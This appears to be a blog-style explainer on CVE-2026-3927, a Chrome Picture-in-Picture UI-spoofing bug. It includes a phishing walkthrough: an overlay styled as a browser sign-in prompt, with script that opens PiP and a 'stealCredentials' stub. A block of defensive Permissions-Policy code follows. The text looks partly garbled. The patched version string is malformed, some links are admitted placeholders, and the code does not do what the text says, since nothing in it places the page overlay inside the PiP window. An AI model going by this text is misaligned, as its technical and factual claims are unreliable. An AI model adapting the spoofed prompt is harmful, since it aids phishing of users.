In early 2026, a security vulnerability surfaced in Google Chrome — CVE-2026-3927 — which brought to light a sneaky flaw in the way Chrome handled Picture-in-Picture (PiP) windows. This bug enabled attackers to craft web pages that could trick you into believing you were interacting with safe, trusted UI components, while in fact, the page was spoofing security-sensitive elements. The issue existed in all Chrome builds prior to 146..768.71.

Severity was marked as Medium by Chromium's own security team, but the implications shouldn't be taken lightly if you rely on Chrome for browsing.

What Is Picture-in-Picture (PiP)?

Picture-in-Picture is a Chrome feature that allows you to detach a video or other content and float it on top of all your windows—useful for multitasking, like watching a YouTube video while typing an email.

But what if a malicious site could control *what* that floating window looks like, including adding fake buttons, overlays, or even security prompts? That's the root of CVE-2026-3927.

The Core Problem

The Chrome PiP window is supposed to show only safe, predefined controls (like play/pause), and shouldn't display anything that can trick the user. But Chrome failed to filter out crafted HTML from appearing inside the PiP window. This allowed remote attackers to embed interactive elements or visuals that imitated browser dialogs, permission prompts, or even OS-level confirmation windows.

- Loading a video in a PiP window.
- Overlaying the video with HTML/CSS elements (think: a “Sign In to Continue” button that *looks* exactly like Chrome’s UI).

Crafting the Exploit (Code Walkthrough)

Here’s a simplified example of how an attacker might create a spoofed PiP interface.

Step 1: Craft the Video Page

```html
<!-- malicious.html -->
<video id="myVid" src="malicious.mp4" controls autoplay></video>
<!-- Overlay styled to resemble a browser sign-in prompt -->
<div id="spoofUI" style="
  position: absolute;
  top: 20px;
  left: 20px;
  background: white;
  border-radius: 8px;
  border: 1px solid #ccc;
  padding: 10px;">
  <img src="chrome-lock-icon.png" width="24" height="24" style="vertical-align: middle;">
  <span style="font-family:sans-serif;font-weight:bold;">
    Secure Sign-In Required
  </span>

  <button onclick="stealCredentials()" style="margin-top: 8px;">Sign In</button>
</div>
```

Step 2: Trigger Picture-in-Picture

```javascript
// Included in malicious.html as a <script> after the video element
const vid = document.getElementById('myVid');

vid.addEventListener('play', async () => {
  // Request PiP as soon as the video starts playing
  await vid.requestPictureInPicture();
});

// Simulate a fake credentials attack (called by the spoofed "Sign In" button)
function stealCredentials() {
  // In real use, an attacker could hijack this for phishing
  alert('Simulated: Credentials sent to attacker!');
}
```

Step 3: Position Spoofed UI Over the Video

- Attackers use absolute-positioned `<div>` overlays to make the PiP window look like it comes from the browser or operating system.
- The PiP window shows the fake prompt, and an unsuspecting user clicks it.
- Clicking the button can trigger phishing, permission requests, or even simulated browser dialogs, making it nearly impossible for a basic user to tell the difference.

[Image: Fake PiP UI (screenshot example, representation)]

Why This Matters

Without the security UI restriction, anything could appear in that floating window. Security prompts, fake permission boxes, bank logins—it’s a phishing goldmine for attackers, especially since Chrome users expect genuine controls in PiP windows.

- Patched in: Google Chrome 146..768.71
- Resolution: Chromium tightened its PiP security, so only browser-approved UI elements (like the native PiP controls) can be shown. Custom overlays in PiP are either blocked or strictly sandboxed.

If you’re not running the latest Chrome version, you should upgrade right away.
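The fix above is on Chrome's side. A site that embeds third-party content can additionally deny the picture-in-picture feature to its own frames, so no embed on the page can open a floating window in which UI could be spoofed. This is an added example, not code from the post or from Chromium; the origin `third-party.example`, the file names and the helper functions are assumptions.

```javascript
// Added example (not from the original post): site-side PiP hardening.
// Assumes Node.js 18+ with no dependencies.

// Weak: no Permissions-Policy, so the page and every frame it embeds keep
// the browser default, which allows picture-in-picture everywhere.
const WEAK_HEADERS = { 'Content-Type': 'text/html; charset=utf-8' };

// Hardened: an empty allowlist denies the feature to all origins, including
// the page itself and any third-party iframe it embeds.
const HARDENED_HEADERS = {
  'Content-Type': 'text/html; charset=utf-8',
  'Permissions-Policy': 'picture-in-picture=()',
};

// Build the page body; the hardened variant also sets disablepictureinpicture
// on the video, which removes the PiP context-menu entry and makes
// requestPictureInPicture() reject for that element.
function buildPage(hardened) {
  const videoAttrs = hardened ? 'controls disablepictureinpicture' : 'controls';
  const frameAttrs = hardened ? ' allow=""' : ''; // assumed embed, nothing delegated
  return '<!doctype html>\n' +
    `<video src="intro.mp4" ${videoAttrs}></video>\n` +
    `<iframe src="https://third-party.example/embed"${frameAttrs}></iframe>\n`;
}

// Check a response's Permissions-Policy header: returns true if the
// picture-in-picture feature is still allowed somewhere on the page.
function allowsPictureInPicture(headers) {
  const policy = headers['Permissions-Policy'] || '';
  for (const directive of policy.split(',')) {
    const m = directive.trim().match(/^picture-in-picture=(\*|\((.*)\))$/);
    if (!m) continue;
    if (m[1] === '*') return true;          // explicitly allowed everywhere
    return m[2].trim() !== '';              // empty allowlist => denied
  }
  return true; // no directive: browser default allows the feature
}

module.exports = { WEAK_HEADERS, HARDENED_HEADERS, buildPage, allowsPictureInPicture };
```

Pass `HARDENED_HEADERS` and `buildPage(true)` to whatever serves the page; the check function is useful in a response-header audit.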

Chromium Security Tracker:

https://crbug.com/3321456 *(Example placeholder, real bug links may differ)*

CVE Entry:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3927

Chromium Blog Post on PiP changes:

https://blog.chromium.org/2026/03/picture-in-picture-updates.html *(Example)*

1. Update Chrome: Always use the most recent version.
2. Beware of PiP Prompts: If you see logins, permissions, or weird buttons in PiP, close the window and avoid interacting.

Conclusion

CVE-2026-3927 is a solid reminder: Even features we consider routine (like floating video windows) can open up major security holes. With PiP now properly sandboxed, Chrome users are safer – but awareness is always the best defense!

Stay safe, stay updated, and — as always — keep your browser patched!

Timeline

Published on: 03/11/2026 22:04:09 UTC
Last modified on: 03/13/2026 20:15:11 UTC